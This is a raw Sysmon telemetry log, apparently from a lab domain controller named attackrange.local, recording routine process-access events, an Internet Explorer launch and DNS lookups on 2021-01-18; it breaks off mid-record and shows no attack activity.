13:58:39.461{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.461{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.461{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-93FA-6005-FC04-00000000A301}37846472C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+cfc37|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHLWAPI.dll+e1f7 154100x800000000000000013212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=DED3D744D46A5CE7965CE2B75B54958A,SHA256=70C9616C026266BB3A1213BCC50E3A9A24238703FB7745746628D11163905D2F,IMPHASH=9BB01C801600CEBDCA166D0534E98CE6{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 22542200x800000000000000013211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.419{59A5CD1D-8E46-6005-1600-00000000A301}1544ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\System32\svchost.exe 22542200x800000000000000013210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.352{59A5CD1D-8E46-6005-1600-00000000A301}1544login.live.com0type: 5 login.msa.msidentity.com;type: 5 www.tm.lg.prod.aadmsa.akadns.net;type: 5 prda.aadg.msidentity.com;type: 5 www.tm.a.prd.aadg.akadns.net;::ffff:40.126.31.8;::ffff:40.126.31.139;::ffff:40.126.31.141;::ffff:40.126.31.143;::ffff:20.190.159.132;::ffff:20.190.159.134;::ffff:20.190.159.138;::ffff:40.126.31.6;C:\Windows\System32\svchost.exe 22542200x800000000000000013209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.167{59A5CD1D-8E56-6005-2E00-00000000A301}2464208.118.189.20.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.152{59A5CD1D-8E56-6005-2E00-00000000A301}2464182.79.125.104.in-addr.arpa.0type: 12 a104-125-79-182.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000013207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.368{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl.usertrust.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 10341000x800000000000000013270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 